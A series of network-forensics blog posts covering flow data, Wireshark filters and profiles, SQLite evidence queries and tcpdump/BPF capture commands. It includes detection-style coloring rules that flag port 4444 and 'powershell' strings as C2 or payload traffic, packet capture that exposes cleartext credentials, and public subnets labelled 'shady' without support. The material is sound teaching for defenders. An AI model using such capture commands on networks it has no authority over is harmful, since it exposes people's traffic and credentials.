Regenerating TAPs – Clone traffic to multiple output ports, so you can feed data to multiple sensors or analysis tools at the same time. This is gold during IR, when one team might be doing full packet capture while another is looking at behavior or writing detections.

-------------------------------------------------------------------------------------------------------------

Cloud's Not Left Out Either

Guess what? Traffic mirroring isn't just for on-prem anymore. Cloud vendors finally gave us what we need:

AWS: VPC Traffic Mirroring, which mirrors traffic from ENIs (Elastic Network Interfaces) to a collector.
Google Cloud: Packet Mirroring, which works across instances in a VPC.

These are awesome for cloud visibility, but remember to monitor your costs—mirroring traffic can rack up bandwidth charges!

TAPs vs. Port Mirroring: What You Really Need to Know

Cost: port mirroring is free (built into the switch); TAPs are expensive.
Reliability: mirroring can drop packets; a TAP is rock solid.
Setup impact: mirroring needs no downtime; installing a TAP requires a brief outage.
Complexity: mirroring is a simple config; TAP complexity varies with features.
Use case: mirroring suits light monitoring; TAPs suit heavy-duty IR and forensics.

-------------------------------------------------------------------------------------------------------------

Let's Talk About Network Flow Data

Yup, we're talking NetFlow, VPC Flow Logs, DNS logging, and all the juicy network breadcrumbs attackers leave behind. Whether you're responding to a breach or threat hunting proactively, this kind of telemetry is pure gold.

What the heck is NetFlow, and why should I care?

NetFlow is basically metadata about traffic that moves across a network. It won't show you full packet content (so don't expect to see passwords or payloads), but it tells you who talked to whom, for how long, how many packets, and how much data. Think of it like your phone bill: you may not hear the conversation, but you know who called whom, for how long, and from where.

-----------------------------------------------------------------------------------------------------------

Where Can You Get Flow Data From?

Internal Devices

Most routers and firewalls (especially enterprise-grade ones) can export flow logs. Many switches with Layer 3 or 4 capabilities can do this too. Just note: it's often disabled by default, so check that setting first.

Want endpoint-level logging? You can configure workstations and servers using tools like:

fprobe
pmacct
nprobe

Now, if you're in the middle of an incident or running a hunting operation, you can even pair these tools with port mirroring to collect flows tactically. Super useful if you want focused visibility without touching every endpoint.

-----------------------------------------------------------------------------------------------------------

Cloud Platforms

For those running workloads in the cloud:

AWS gives you VPC Flow Logs
Azure has NSG Flow Logs
Google Cloud provides VPC Flow Logs

These are cloud-native equivalents of NetFlow and can be integrated right into your detection pipeline. Just remember to tune what's being logged so you're not overwhelmed.
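Flow records are just rows of metadata, which makes them very scriptable. A minimal triage sketch, assuming the flows have been exported to CSV (the filename, the src/dst/bytes column names, and the 100 MB threshold are all assumptions—adapt them to your own export format):

import csv
from collections import defaultdict

outbound = defaultdict(int)
with open("flows.csv", newline="") as f:  # hypothetical flow export
    for row in csv.DictReader(f):         # assumed columns: src, dst, bytes
        outbound[(row["src"], row["dst"])] += int(row["bytes"])

# Flag conversations that moved more than ~100 MB — possible staging or exfiltration
for (src, dst), total in sorted(outbound.items(), key=lambda kv: -kv[1]):
    if total > 100_000_000:
        print(f"{src} -> {dst}: {total / 1e6:.1f} MB")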
-----------------------------------------------------------------------------------------------------------

Why Is NetFlow So Useful in IR?

Let's say you detect a suspicious IP today. You can go back and ask:

Has this IP connected to us before?
What systems did it talk to?
Was data sent out (exfiltration)?
Is there a pattern of beaconing (C2)?

The cool thing is that NetFlow data is super fast to query, and because it's metadata, it's not as sensitive or heavy as full packet capture. That means storage and privacy concerns are much lower. You can also spot odd behavior like:

Massive outbound flows → data theft?
Repetitive small bursts of traffic → C2?
Connections to known-bad IPs → APT action?

-----------------------------------------------------------------------------------------------------------

Okay, But How Do We Actually Get the Logs?

Great question. Just because the devices can generate logs doesn't mean you'll have access. Many security appliances have painful UI-based exports—especially if they're managed by an MSSP. You must test the log collection/export mechanism before an incident happens. Can't access the device? Then make sure the admins can, and fast. Or, better yet, automate the process if possible.

If logs are being sent to you by someone else, make sure:

The logs are secure (in transit and at rest)
File formats and sizes are supported
Everyone involved knows how to collect and send the data

Pro tip: set up regular drills with your team so that collecting and reviewing logs becomes second nature.

-------------------------------------------------------------------------------------------------------------

External Evidence: Often Forgotten, But Invaluable

This one's often overlooked.

Your ISP
Yep, your ISP may collect NetFlow from boundary routers. If you have a good relationship with them (and legal clearance), they might be able to give you insight into every bit of inbound and outbound traffic. This can be life-saving if your internal logs were wiped or weren't enabled.

Other Organizations
If your infrastructure is used to attack someone else (e.g., you got pwned and became a launchpad), they might send you logs showing:

Source IP
Port used
Packet metadata

But let's be real—no one is going to start these conversations in the middle of a crisis. This is where ISACs and threat intel sharing groups can help. Set up those channels before you need them.

------------------------------------------------------------------------------------------------------------

Planning Your Logging Strategy

There are three types of planning scenarios:

1. Strategic/Architectural (Baked-In)
This is where security folks are part of the network design from the beginning. You decide where to place proxies, IDS sensors, and flow log exporters before any incident happens.

Pros:
Zero downtime when an incident hits
Continuous visibility
Forces network engineers to build security into the design

Cons:
Expensive
Requires justification (hard to show value until things go wrong)
Might involve proprietary data formats (vendor lock-in)

2. Tactical/Ad-Hoc Platforms
This is my personal favorite—especially if you're low on budget. Build or buy portable packet capture boxes that you can deploy anywhere in the network when needed.

Pros:
Super flexible
You control the setup
Easier to train your team on

Cons:
Might need downtime to insert the box
You'll need solid documentation for how/when/where to deploy

These are best when paired with a few pre-positioned sensors in high-value areas.
3. "We'll Figure It Out When It Happens"
No. Just... no. Seriously, don't wing it. You'll be halfway through the breach trying to order a capture card off Amazon.

Instead, build a hybrid model:

Place permanent monitors at your perimeter and around your crown jewels
Keep a few tactical boxes on standby
Train your team regularly so they know how to use both

-----------------------------------------------------------------------------------------------------------

Don't Forget DNS Visibility

One last but crucial thing: DNS logs. DNS is everywhere, and attackers love it for C2, exfiltration, and even domain generation algorithms (DGAs). Make sure:

Internal DNS resolvers are logging queries and responses
External DNS providers (like Google, Cloudflare, etc.) are integrated into your SIEM if they allow it

DNS visibility = quicker scoping, faster identification of malware domains, and a better understanding of attacker behavior.

-----------------------------------------------------------------------------------------------------------

Wrapping It Up

This stuff isn't just for blue teams. Red teamers, threat hunters, and IR folks all benefit from proper flow visibility. If you're serious about incident response or DFIR, flow data isn't a luxury—it's a necessity. Let's keep pushing for open-source cybersecurity knowledge.

--------------------------------------------Dean---------------------------------------------------------
- Master Wireshark Like a Pro – The Ultimate Packet Analysis Guide for Real-World Analysts
Thanks for stopping by! I know you've probably come across tons of Wireshark articles already, but trust me—this one's different. I've kept it real, practical, and straight from an investigator's perspective. Give it a read, and you'll see exactly what I mean. 🦈

-----------------------------------------------------------------------------------------------------------

Hey folks 👋 Dean here! If you're diving into packet analysis or network forensics, you will spend a LOT of time inside Wireshark—that's just a fact. This article is all about getting comfortable with Wireshark's GUI and some key features that make your job easier and your analysis sharper.

Wireshark's Interface – Know Your Panes

When you open Wireshark, the interface is split into three main sections (panes), and each plays a unique role:

1. Packet List Pane
This is your bird's-eye view. Each row is a packet. By default, you'll see columns like:
Time – time since the start of the capture (can be changed to UTC/human-readable format)
Source/Destination IPs
Protocol
Info – a quick summary, which is super helpful when scanning for suspicious behavior
You can fully customize this view: add, remove, or reorder columns. For instance, you can add http.user_agent as a column—it's simply empty for non-HTTP packets, of course.

2. Packet Details Pane
Now we get to the fun part—protocol decoding! Here you'll see the packet broken down by layers:
Ethernet → IP → TCP/UDP → application-layer data
Each section is clickable and expandable. This pane is gold when you're analyzing weird or unfamiliar protocols, because Wireshark does the heavy lifting and shows human-readable names and field values.

3. Packet Bytes Pane
This is your raw hex + ASCII view. It may feel intimidating at first, but trust me—this view is powerful. You can click on a byte here and it will highlight the corresponding field in the Packet Details pane (and vice versa).

-----------------------------------------------------------------------------------------------------------

Smart Display Filters – Your Best Friend in Big PCAPs

When you're staring at thousands of packets, display filters are a lifesaver. You'll find the Display Filter Toolbar at the top. You can type things like:

http
ip.addr == 192.168.1.1
tcp.port == 443

These don't just make your life easier—they help you zoom in on what's important without the noise.

Down at the bottom, the Status Bar tells you:
Total packets
Packets matching your current filter
Field names and byte sizes for whatever you're hovering over
Super useful when building precise filters or understanding payload size.

Layout Customization – Looks Can Boost Productivity

Wireshark lets you change the pane layout! 🧱 This might sound cosmetic, but if you're working on a small screen, a widescreen monitor, or presenting on a projector, tweaking the layout can hugely improve usability. Choose from six layouts and decide what each pane shows. Try it. It helps.

Let's Talk OPSEC – DNS Lookups and What NOT to Do

By default, Wireshark disables DNS lookups. That's not a bug, that's a feature. Here's why:

Performing live DNS lookups for every IP in a capture slows everything down.
Worse: if you're analyzing malware traffic, querying attacker infrastructure can tip them off that you're onto them.

Never turn on "Use an external network name resolver" if you care about stealth. Trust me—adversaries do monitor their DNS logs.
Instead, use "Use captured DNS packet data for address resolution". This resolves hostnames from the DNS packets already in the capture—no external traffic.

Timestamp Formats – Pick What Works for You

Wireshark gives you multiple time format options:

Seconds since capture start (default)
UTC (recommended)
Local time
With or without microsecond precision

You can change this from the View > Time Display Format menu.

⚠️ Keep in mind: timestamps in the packet metadata (in the pcap itself) are in UTC, but any timestamps inside the packet data (like HTTP headers or app logs) can be in any timezone. So don't mix them up.

-----------------------------------------------------------------------------------------------------------

🔧 More Tips for Better Investigations

Add your own custom columns! Need to see dns.qry.name in the top view? You can add it.
Use color rules to highlight suspicious traffic—e.g., make HTTP POSTs green.
Save your profiles—layout, filters, colors—for different use cases (malware, exfil, RDP analysis, etc.).

HOW TO CREATE A PROFILE IN WIRESHARK

Open Wireshark
Go to Edit > Configuration Profiles
Click New and give it a name (e.g., MalwareAnalysis)
Select it, then click OK
This activates the profile—you'll now be customizing this one

Let me give you an example:

1. MALWARE ANALYSIS PROFILE

Columns to add:
frame.number
ip.src
ip.dst
tcp.stream
http.request.method
http.host
http.request.uri
dns.qry.name
tcp.len

Coloring rules:
http.request.method == "POST" – suspicious POSTs – red background
dns.qry.name contains ".xyz" – suspicious TLD – purple background
tcp.port == 4444 – possible C2 comms – dark red background
udp contains "powershell" – obfuscated payloads – orange background

Note: If I receive any requests, I'll publish a follow-up article sharing a few ready-made profiles that can assist in deeper analysis. However, if you're only interested in learning how to create a profile, the information in this article should be sufficient.

-----------------------------------------------------------------------------------------------------------

Let's Talk About Display Filters

Imagine we're staring at a huge PCAP file—like, thousands of packets—and we need to find just the suspicious HTTP request or that DNS reply pointing to a shady domain. Manually clicking through each packet? Nope. That's where Wireshark display filters come in. And trust me, once you get the hang of them, they'll become your best friend in traffic analysis.

First, What Are Display Filters?

Wireshark is already super powerful with its decoders and GUI, but display filters make it even better. Basically, display filters allow you to tell Wireshark: "Hey, show me only the packets that match this very specific condition."

And here's the kicker—any field Wireshark can decode can also be filtered. Whether it's an IP address, port number, DNS name, cookie value, or even the number of DNS answers—if it's in the packet and Wireshark can read it, you can filter on it.

Display Filter vs. Capture Filter (BPF)

You may be wondering: "Wait, isn't that what capture filters do?" Great question.

🟢 Capture filters (BPF) work before the packets are even captured—they sit close to the kernel, fast and efficient.
🟡 Display filters work after the capture—they analyze the decoded traffic and give you crazy granularity.

So if you're capturing live and only want HTTP port 80 traffic:

tcp port 80

(That's a capture filter, BPF-style.)
But once the PCAP is saved and you want to find HTTP packets with the word "hack" in them, that's when display filters shine:

http contains "hack"

Real-Life Examples You'll Actually Use

Let's look at some cool and practical filters you'll definitely end up using:

1. Find non-standard HTTP traffic containing specific text
(not tcp.port == 80 and not tcp.port == 8080) and http contains "hack"

2. DNS replies with more than 5 answers (maybe shady as hell)
dns.flags.response == 1 and dns.count.answers > 5 and dns.qry.name contains "drive.io"

3. Case-insensitive matching (thanks to regex!)
http.cookie matches "(?i)dean"

4. OR multiple status codes like a pro
http.response.code in {200 301 302 404}

Finding Field Names for Filters

One of the most common questions is: "How do I even know what field name to use?" Here's the trick: right-click any field in the Packet Details pane (the middle pane), and you'll see:

✅ Apply as Filter — applies the filter instantly
📝 Prepare a Filter — lets you tweak the filter before running it

Let's say you've got a DNS query for www.cyberengage.org and you want to filter only those. Wireshark shows the field name as:

dns.qry.name == "www.cyberengage.org"

That's it. The GUI does half the work for you!

The Stoplight System (Green, Yellow, Red)

Wireshark helps with syntax too. You'll see the filter bar change colors:

🟩 Green – valid syntax, ready to go
🟥 Red – error in the field name or syntax (like missing quotes)
🟨 Yellow – valid syntax, but potential logical issues (like using != in the wrong way)

Let's Talk About !=

Here's where things get tricky—the != operator might not behave like you'd expect. Say you write:

dns.a != 192.168.1.1

Wireshark may still include packets with that IP. Why? Because the same packet also had a different dns.a value. So the better filter would be:

dns.a && !(dns.a == 192.168.1.1)

This means: "Show me packets that have any dns.a field, but NOT if any of those values is 192.168.1.1." Tricky, right? But powerful once you get it.

-----------------------------------------------------------------------------------------------------------

Let's Talk About TCP Streams

What Is "Follow TCP Stream" and Why It's Gold

Let's start with the basics. Imagine you're deep inside a pcap file, tracking an IP address that might be talking to a shady server. You click on a suspicious packet, right-click it, and boom—there's this magical option: "Follow → TCP Stream."

What this does is extract the entire conversation (client-to-server and server-to-client) into a single readable view. It's color-coded too:

🔴 Red = client → server
🔵 Blue = server → client

It's super helpful, especially for ASCII-based protocols like HTTP, FTP, SMTP, or even Telnet. You can literally read full login attempts, commands, and responses like reading a chat transcript.

A Pro Tip

There's a dropdown labeled "Entire Conversation." You can use it to focus on just one side of the traffic—really helpful when the streams get noisy or tangled.

Not Just TCP

Wireshark lets you follow UDP, TLS, and HTTP streams too. This is great for protocols that don't rely on TCP's session-based structure.

Beyond the Basics: Must-Know Features in Wireshark

Wireshark is a beast—no other way to put it.

Decode As an Alternate Protocol

Sometimes threat actors do shady things like running HTTP traffic over random ports (say, port 9999). Wireshark might misinterpret the protocol. With Decode As, you can force Wireshark to analyze the traffic using the protocol you know is actually being used.
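Everything the filter bar does can be scripted, too. A minimal sketch using pyshark, a third-party Python wrapper around tshark (the filename is illustrative, and pyshark needs tshark installed and on the PATH):

import pyshark  # pip install pyshark

# Apply the same display-filter syntax you'd type into the Wireshark filter bar
cap = pyshark.FileCapture("suspicious.pcap", display_filter="http.request")
for pkt in cap:
    print(pkt.http.host, pkt.http.request_uri)
cap.close()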
Traffic Capture Tips Wireshark can both capture and analyze traffic. But beware — the GUI adds processing overhead , and you might drop packets if you’re capturing high-volume traffic. ----------------------------------------------------------------------------------------------------------- Final Thoughts In real-world cases, these tools help you go from “what’s going on?” to “here’s exactly what happened” —faster and with more confidence. Don’t be afraid to explore, experiment, and get your hands dirty. The more comfortable you get with these tools, the more powerful and efficient your analysis becomes. Keep digging, keep questioning, and most importantly, keep learning . You’re not just reading packets—you’re uncovering stories hidden deep in the network. Thanks again for reading. I hope this walkthrough gave you something valuable—something practical you can carry into your next case or lab session. Happy hunting! ( https://wiki.wireshark.org/ ) ----------------------------------------Dean--------------------------------------------
- Forensic Analysis of SQLite Databases
SQLite databases are widely used across multiple platforms, including mobile devices, web browsers, and desktop applications. Forensic analysts often encounter SQLite databases during investigations, making it essential to understand their structure and the tools available for analyzing them. Understanding SQLite Databases SQLite databases consist of multiple files, each serving a specific purpose. Identifying these files is crucial during forensic investigations: Main Database File: Typically has extensions such as .db, .sqlite, .sqlitedb, .storedata, or sometimes no extension at all. Write Ahead Log (WAL): A .wal file that may contain uncommitted transactions, providing additional forensic insights. Shared Memory File: A .shm file that facilitates transactions but does not store data permanently. Analyzing SQLite Databases An SQLite database consists of tables that store data in columns. Some databases have a single table, while others contain hundreds, each with unique schemas and data types. When performing forensic analysis, it’s important to understand how these tables interact and how data is stored. Tools for SQLite Analysis Forensic analysts use various tools to examine SQLite databases. These tools fall into a few main categories: GUI-Based Viewers: User-friendly tools like DB Browser for SQLite allow visual analysis but may automatically merge WAL file transactions into the main database. Command-Line Utilities: Tools like sqlite3 provide a powerful way to run queries and extract data, making them ideal for scripting and automation. Forensic-Specific Tools: These tools offer advanced recovery features, allowing analysts to examine deleted records and unmerged transactions. Querying SQLite Databases Once the database structure is understood, analysts can run SQL queries to extract relevant information. Below are key SQL operations commonly used in forensic investigations: 1. Using the SELECT Statement The SELECT statement retrieves data from a table. The simplest form is: SELECT * FROM fsevents; This retrieves all columns from the fsevents table. However, for targeted analysis, selecting specific columns is more efficient: SELECT fullpath, filename, type, flags, source_modified_time FROM fsevents; When multiple tables share column names, it’s best to specify the table name: SELECT access.service, access.client FROM access; 2. Converting Timestamps Many SQLite databases store timestamps in Unix epoch format. Converting them to a readable format is crucial for timeline analysis: SELECT url, visit_time, datetime((visit_time / 1000000) - 11644473600, 'unixepoch', 'localtime') AS last_modified FROM visits; The AS keyword renames the column for better readability. 3. Using DISTINCT to Find Unique Values The DISTINCT keyword helps identify unique values within a column. For instance, to find the unique URLs in the urls table: SELECT DISTINCT url FROM urls; 4. Using CASE for Readability To make data more understandable, analysts can use the CASE expression to replace numerical values with meaningful labels: SELECT url, visit_count, CASE hidden WHEN 0 THEN "visible" WHEN 1 THEN "hide" END AS Hidden, datetime((last_visit_time / 1000000) - 11644473600, 'unixepoch', 'localtime') AS last_modified FROM urls
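Quick practical note before we move on to sorting: you don’t need a GUI to run any of these queries. The sqlite3 command-line client executes them directly — a minimal sketch, assuming History.db is a copy of a browser database containing the urls table (always query a copy, never the original evidence):
sqlite3 -header -column History.db "SELECT url, visit_count FROM urls LIMIT 10;"
The -header and -column flags just make the output readable in a terminal.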
5. Sorting Data with ORDER BY Sorting records chronologically can help establish an event timeline. The ORDER BY clause arranges records based on a specified column: SELECT url, visit_count, CASE hidden WHEN 0 THEN "visible" WHEN 1 THEN "hide" END AS Hidden, datetime((last_visit_time / 1000000) - 11644473600, 'unixepoch', 'localtime') AS last_modified FROM urls ORDER BY last_modified DESC; 6. Filtering Data with WHERE and LIKE For large datasets, filtering results is essential. The WHERE clause helps narrow down data based on conditions: SELECT url, visit_count, CASE hidden WHEN 0 THEN "visible" WHEN 1 THEN "hide" END AS Hidden, datetime((last_visit_time / 1000000) - 11644473600, 'unixepoch', 'localtime') AS last_modified FROM urls WHERE last_modified LIKE '2025-01-16%'; The % wildcard allows partial matches, making it useful for date-based searches. ----------------------------------------------------------------------------------------------------------- Conclusion SQLite database forensics plays a crucial role in digital investigations, from mobile forensics to malware analysis. By understanding SQLite file structures, using the right tools, and applying effective query techniques, forensic analysts can extract valuable insights from databases. -------------------------------------------------Dean-----------------------------------------------
- BPF Ninja: Making Sense of Tcpdump, Wireshark, and the PCAP World
Hey folks! Today we’re diving into a topic every network forensic analyst must get familiar with: tcpdump and the power-packed world around it — Wireshark, pcap, pcapng, and all the little details that actually matter when you're dealing with real-life packet analysis. If you’re like me and enjoy understanding why a tool works the way it does (and not just copy-pasting commands from Stack Overflow), this blog’s for you. So, What’s tcpdump and Why Should You Care? Imagine this: You're investigating suspicious traffic, and all you’ve got is command line access. You need something light, fast, reliable—and boom— tcpdump comes to your rescue. It’s a CLI-based packet capture tool that lets you sniff traffic in real time, apply filters, and save packet data for analysis. Originally born in the *NIX universe, it now works on Windows too. Pretty cool, right? Under the hood, tcpdump uses the legendary libpcap library, which is like the oxygen tcpdump breathes. Here's what makes it so useful: 💡 Key Superpowers of tcpdump (Thanks to libpcap): 🔍 1. BPF (Berkeley Packet Filter) This is a simple filtering language that lets you capture only the traffic you want. For example: tcpdump port 443 and host 192.168.1.9 Boom—you’re only grabbing HTTPS packets to/from that host. 💾 2. Capture or Save Packets You can choose to display packet headers on-screen, or save them into .pcap files to analyze later. These files are gold for forensic investigations. Imagine capturing something today and analyzing it 3 years later—yep, pcap has your back. 🔁 3. Live or Offline tcpdump can sniff a live interface or read from a saved .pcap file as if it’s a live stream. That’s super helpful when you’re analyzing a case retrospectively. 📏 4. Snaplen Control Don't want to capture entire packets because of size or legal constraints? Use -s to define the snap length (i.e., number of bytes to capture per packet). Capturing just the headers? No problem. tcpdump -s 96 -i eth0 -w output.pcap 🧠 Heads-Up: tcpdump Is for Capturing, Not Deep Diving tcpdump is great for capturing data, but it doesn’t do fancy analysis. When you want to dissect those packets like a digital autopsy, you bring in the big gun: Wireshark. 🐟 Enter Wireshark: Your Friendly GUI Packet Analyzer Wireshark is a graphical application that reads .pcap and .pcapng files, and honestly, it's a lifesaver when you're trying to figure out what went down on the wire. It decodes hundreds of protocols out of the box and lays everything out for you in a beautiful 3-pane display. What makes Wireshark insanely useful: Auto-dissectors for common protocols Follow TCP Stream feature for full conversation analysis Color-coded filtering Click-and-zoom details for every packet field Pro tip: You can capture packets directly in Wireshark, but for high-volume environments or remote machines, stick with tcpdump. 📟 Want CLI Power with Wireshark's Brain? Use tshark Wireshark also comes with tshark, its CLI twin. So you can build your filters in Wireshark’s GUI and then export them to tshark scripts—perfect for large-scale or automated analysis. tshark -r test.pcap -Y 'http.request.method == "GET"' 📂 What’s Really Inside a .pcap File? Okay, this is where things get forensically juicy. A .pcap file is not just a bunch of packets thrown together. It includes metadata that matters: File Header Includes: Magic Bytes: Helps identify it as a pcap file. The classic magic number is 0xa1b2c3d4 — in a little-endian file, the raw bytes read d4 c3 b2 a1. Version: For libpcap compatibility.
Timestamp Offset: Usually zero (all timestamps are in UTC—thank god). Snaplen: Max bytes per packet saved. Link Type: Like Ethernet, Wi-Fi, etc. Each Packet Entry Has: Timestamp (seconds + microseconds since epoch) Captured Length Original Packet Length (in case it was truncated) These tiny details help determine whether you lost data during capture or were just intentionally limiting it. 📦 pcapng: The Next-Gen Format (but Be Careful) Then comes pcapng — aka pcap Next Generation. It’s more flexible and stores: Multiple interfaces in one file Rich metadata (like capture comments) Higher-res timestamps Interface stats and DNS logs Sounds awesome, right? But here’s the catch: Not all tools support it properly. Even some versions of tcpdump can’t read pcapng without throwing vague errors. So what do we do? Convert it to regular pcap using editcap (comes with Wireshark): editcap -F pcap captured_file.pcapng capture_file.pcap Double-check with: file capture_file.pcap And voilà—you’re back in business. 🛠️ Thoughts: tcpdump and Wireshark = A Power Combo Here’s how I look at it: Use tcpdump for quick, controlled, stealthy captures (especially remotely or over SSH). Use Wireshark for visual, detailed, protocol-level analysis. Use tshark when you need scripting and automation. Stick to pcap unless you absolutely need pcapng features. Always verify your captures. A truncated packet can break your case. -------------------------------------------------------------------------------------------------- Let’s talk about BPF Filters We’re diving into something that might sound dry but is actually one of the most powerful tools in your network forensics and incident response toolkit: BPF (Berkeley Packet Filter) syntax. Now, if you’ve worked with tcpdump, Wireshark, or even snort or bro/zeek, you’ve already touched BPF. Think of it like your VIP bouncer at a nightclub—BPF decides what packets are "interesting" enough to get through the door and what gets kicked to the curb. 🧹 So why should you care? Because it’s super-efficient, running close to the kernel, and helps you cut down on noise, saving time and resources during investigations or live captures. 🧠 What Even Is BPF? At its core, BPF is a way to tell your system, “Only give me the packets I care about.” It’s a language that lets you define filters for capturing or processing packets. Since tools like tcpdump and Wireshark use libpcap under the hood, BPF filters work across most major packet capture tools. That’s why learning it once pays off everywhere. 🧱 BPF Primitives: The Basics Let’s say you're filtering water through a sieve. The holes in that sieve are your BPF filters. The smaller and more specific the holes, the more precise the capture. Here are the building blocks (called primitives): ip, ip6, tcp, udp, icmp: Protocol matchers. ip is IPv4 traffic. ip6 is IPv6. If you want both: ip or ip6. host: Filters packets by IP address (Layer 3). Example: host 192.168.1.1 ether host: Filters by MAC address (Layer 2). Example: ether host 00:11:BA:8c:98:d3 net: Filters by network range (CIDR). Example: net 10.0.0.0/8 (note: the network address has to match the mask — tcpdump rejects something like net 172.168.1.1/8 because host bits are set) port: Filters by TCP/UDP port (Layer 4). Example: port 443 (catches both TCP and UDP unless specified) portrange: A range of ports. Example: portrange 20-25 💡 Tip: BPF is stateless. It evaluates each packet independently, so if you're tracking a flow or multi-step exchange, that's handled in higher layers (e.g., Zeek, Suricata). 🔄 Directional Filters: src, dst, both?
Sometimes, you don’t want all traffic to/from an IP—maybe just the ones sent by it. Here’s how direction works: src host 192.168.1.1 → only source. dst port 443 → only destination. ether src 00:11:BA:8c:98:d3 → source MAC. src net 10.0.0.0/8 → source from entire subnet. ⚠️ Note: When you say just host, port, or net, it’s bidirectional. Be specific if needed! 🧮 Combining Filters: AND, OR, NOT This is where it gets fun (and powerful). You can combine primitives logically: tcp and (port 80 or port 443) and not host 192.168.1.1 ⬆️ That says: “Give me all TCP traffic on ports 80 or 443, but exclude anything involving 192.168.1.1.” 📌 Wrap complex filters in quotes, especially in shell commands. Shells interpret parentheses and spaces—don’t let that ruin your day. 🧪 Advanced Primitives (Forensics-Friendly) You’ll probably need these in more forensic-heavy cases: vlan 100 → Capture traffic on VLAN 100. gateway → Detect packets with mismatched Layer 2/3 addressing (good for catching rogue devices). Byte offsets & bitmasks → Ultra-specific matching based on packet byte positions. (More niche, but very powerful!) 🧰 Tcpdump Tips for Real-World Use Let’s be honest—tcpdump can do a LOT more than just watch packets fly by your screen. Here are some gold-nugget options: Flag What it does -i any Capture from all interfaces. -n Disable DNS resolution (important for stealth & speed). -r file.pcap Read from a PCAP instead of live traffic. -w out.pcap Write captured packets to a file. -C 5 Rotate output every 5MB. -G 30 Rotate output every 30 seconds. Use with -w and time-formatted filenames like: -w dump_%F_%T.pcap. -W 10 Keep only the last 10 files (used with -C or -G). -F filter.txt Load a complex BPF filter from a file instead of typing it inline. Super helpful in team environments. 🎯 Real-Life Example: Reducing a PCAP for Wireshark Imagine you’ve got a 500MB pcap file but Wireshark can barely open it. You want to reduce it to something smaller—say, only traffic on HTTP/S or exclude noisy DNS and multicast. Here’s how: tcpdump -n -r full_capture.pcap -w reduced_capture.pcap 'tcp and (port 80 or port 443) and not port 53 and not net 224.0.0.0/4' 💡 This can cut the file size by almost 40–50% if the excluded traffic is significant. 📚 TL;DR - Quick Reference Use quotes! 'port 80 and not host 10.0.0.1' Know your direction: src, dst, host, ether host Reduce noise: Use -n to disable DNS, and filter early Modularize filters: Use -F for long BPFs Save time: Use -C, -G, -W for file rotation -------------------------------------------------------------------------------------------------- Before ending today’s article, I want to share a few commands that might be helpful for you. First, let’s admit it — network forensics can sound scary at first. You open up Wireshark or run tcpdump and BAM! — thousands of packets flying across the screen like it's The Matrix. Let’s jump into some cool and useful tcpdump commands with real-world examples and context. Example 1: Live Sniffing on an Interface — But Keep It Light sudo tcpdump -n -s 100 -A -i eth0 -c 1000 🧠 What it does: Monitors the eth0 interface (you can replace it with yours) Captures only the first 100 bytes of each packet (-s 100) to avoid dumping the whole packet — helpful for big networks. -A dumps the actual ASCII content, which is super helpful for catching things like HTTP requests, cleartext creds, etc. Stops after 1000 packets (-c 1000) so you don’t go blind. -n speeds things up by not resolving DNS or port numbers — we want raw IPs and ports.
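One more trick before Example 2: once your BPF expressions get long, stash them in a file and load them with -F instead of typing them inline (the filenames here are just placeholders):
echo 'tcp and (port 80 or port 443) and not host 192.168.1.1' > web.bpf
sudo tcpdump -n -i eth0 -F web.bpf -w web_traffic.pcap
Same filter, zero shell-quoting headaches — and the filter file can be version-controlled and shared with your team.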
Example 2: Filter a pcap file for traffic from one host tcpdump -n -r captured.pcap -w filtered.pcap 'host 192.168.1.1' 📂 You already have a .pcap file but you’re only interested in what one machine (say, 192.168.1.1) was up to. -r captured.pcap: Reads the original pcap. -w filtered.pcap: Writes only the filtered traffic. 'host 192.168.1.1': Our BPF (Berkeley Packet Filter) here filters both source or destination. 🧪 Try changing 'host' to: 'src host 192.168.1.1': only source 'dst host 192.168.1.1': only destination Example 3: Rotate Files Daily for 2 Weeks — DNS Focused sudo tcpdump -n -i eth0 -w dns-%F.%T.pcap -G 86400 -W 14 '(tcp or udp) and port 53' 🧠 What’s going on here: We’re capturing DNS traffic only (TCP or UDP on port 53). -w dns-%F.%T.pcap: Writes files with timestamps (great for organizing). -G 86400: Rotates every 86,400 seconds = 1 day. -W 14: Keeps only 14 files, so after 2 weeks tcpdump stops writing new files. Perfect for long-term DNS analysis (e.g., DNS tunneling detection, malware beaconing). Example 4: Rotating 100MB Files of Suspected APT Host Traffic sudo tcpdump -n -i eth0 -w suspected.pcap -C 100 'host 192.168.1.1' 🔍 Use this when you want to capture unlimited traffic to/from a shady IP, but don’t want your disk to explode. -C 100: Rolls over to a new file every 100MB. Files will be named like: suspected.pcap, suspected1.pcap, suspected2.pcap, etc. 💡 Tip: Add -W to limit how many files you keep: -W 10 Example 5: Filter HTTP Traffic (not encrypted) and show requests sudo tcpdump -i eth0 -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' 😅 I know, this one looks scary. But here's what it's doing: Filters HTTP packets that actually carry data (and not empty ACKs or TCP keepalives). -A + -s 0 dumps full ASCII of each packet — you can literally see GET and POST requests. Real use case: Someone accessed your internal web app over HTTP. You suspect credential theft or command injection. This gives you a live view of the payloads. Example 6: Capture suspicious outbound connections to multiple ranges sudo tcpdump -i eth0 'dst net 185.100.87.0/24 or dst net 91.219.236.0/24' 🎯 This captures outbound traffic to known shady subnets. Perfect when you're watching beaconing or C2 callbacks. You can expand the filter like this: '((dst net 185.100.87.0/24) or (dst net 91.219.236.0/24)) and not port 443' 👉 Exclude HTTPS to avoid noise! Tips from Me Always test your BPF filter on small captures using -c 100 to make sure it’s not too broad. Wireshark’s filter syntax ≠ tcpdump syntax! In Wireshark, you use ip.addr == x.x.x.x, but in tcpdump you just say 'host x.x.x.x'. Use tcpdump -D to list all interfaces. When in doubt, log to file first, analyze later. Don't grep in real-time unless you know what you're doing. Bonus: Convert pcap to readable text Want to take a .pcap and turn it into readable logs? tcpdump -nn -tttt -r suspicious.pcap > readable_logs.txt You’ll get timestamps + decoded traffic — perfect for incident timelines or report writing. Final Words Tcpdump is one of those tools that feels a bit raw at first, but once you get the hang of BPF filters, it's like having X-ray vision for your network. It's lightweight, powerful, and deadly accurate when used right. Combine it with tools like Wireshark for analysis and you've got a forensic powerhouse in your hands. ------------------------------------------------Dean-------------------------------------------------
- Proxies in DFIR – Deep Dive into Squid Log & Cache Forensics with Calamaris and Extraction Techniques
